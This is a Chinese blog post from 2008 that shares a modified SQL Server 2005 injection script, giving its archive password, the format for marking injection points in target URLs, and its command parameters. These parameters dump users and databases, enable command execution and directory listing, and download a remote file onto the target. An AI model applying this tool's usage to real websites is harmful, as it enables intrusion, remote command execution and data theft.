Sql2005注入辅助脚本[修改版]

2008/11/06 13:35 | 鬼仔 | 工具收集 | 占个座先

# 鬼仔:密码是  fuckandfuck

版权所有:
http://www.pcsec.org
BK瞬间群
感谢无敌小黄瓜的投递

原始代码可见http://hi.baidu.com/tr4c3/blog/item/da1c1c30c93da89ca9018e27.html
经过黄瓜修改代码,功能更加强大了,希望能给大家的渗透工作带来方便。

程序说明:
+========== =================== ================ ================ ===========  +

+             Made By tr4c3,Modified  By 无敌小黄瓜【bk瞬间群】                +

+========== =================== ================ ================ ===========  +

————–
url.txt内容为:
————–
比如:http://www.google.com/fuck.asp?id=2<sqlinj点>;–

正在注入的是http://www.xxx.com/index.asp?id=1 <sqlinj点>;–

————–
参数:
————–
sql2005 info
sql2005 logbackup
sql2005 users
sql2005 localgroups
sql2005 sqlfile
sql2005 disk
sql2005 pubs clean
sql2005 c:\1.txt mm
sql2005 turn on/off
sql2005 c:\ dir
sql2005 ver cmd
sql2005 “select @@version” query
sql2005 http://fuck.av/hacker.gif c:\1.gif download
sql2005 databases
sql2005 pubs tables
sql2005 pubs authors cols
sql2005 pubs authors au_id values
sql2005 pubs authors au_id id name pass vv
+=====================+
url内容  //注意get方式的有个?

http://www.google.com/index.asp?
id=1′
;–
GET

http://www.google.com/index.asp?
id=1′
;–
POST
Sql2005注入脚本

程序下载:sql2005.rar

Tags: ,

相关日志

楼被抢了 2 层了... 抢座Rss 2.0或者 Trackback

  • 1 | 2008-11-08 02:19 | #

    很喜欢来这里看看,鬼仔 把每一篇文章都完整转帖,尊重作者,尊重知识,不错!

    回复该留言
  • 鬼仔 | 2008-11-08 22:46 | #

    @1: 谢谢你的支持。 :)

    回复该留言

发表评论